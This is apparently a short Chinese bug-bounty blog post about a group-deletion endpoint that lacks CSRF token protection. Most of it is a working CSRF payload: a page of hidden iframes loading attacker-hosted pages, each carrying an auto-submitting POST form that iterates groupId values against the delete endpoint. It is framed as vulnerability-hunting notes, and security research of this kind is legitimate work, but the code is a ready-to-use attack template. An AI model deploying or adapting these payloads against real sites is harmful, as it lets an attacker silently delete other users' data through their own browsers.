layout: post
title: 2. CSRF之批量自动遍历id
category: SRC
tags: SRC
keywords: SRC,CSRF
前言
该篇记录为记录实际的src过程第2篇小文章,内容为csrf
发送多个post
包。
抓包查看csrf特征
在删除用户群组的时候,抓包发现这样的包,没有做csrftoken
的防护,也就是说可以进行csrf的攻击,但是每个用户的groupid
的值未知,所以就有一个遍历的需求,否则危害很低。
csrf遍历发包
问了一波Art3mis
师傅,他说iframe
可以插入多个src链接
,然后通过js
自动化提交多个html
。如:
a.html
<iframe type=hidden src="http://vps/b.html"></iframe>
<iframe type=hidden src="http://vps/c.html"></iframe>
b.html
<form method="POST" action="https://eval/del" id="test">
<input name="groupId" value="10"></input>
</form>
<script>
var f=document.getElementById("test");
f.submit();
</script>
同理,c.html
只要更改value
值就可以构造了。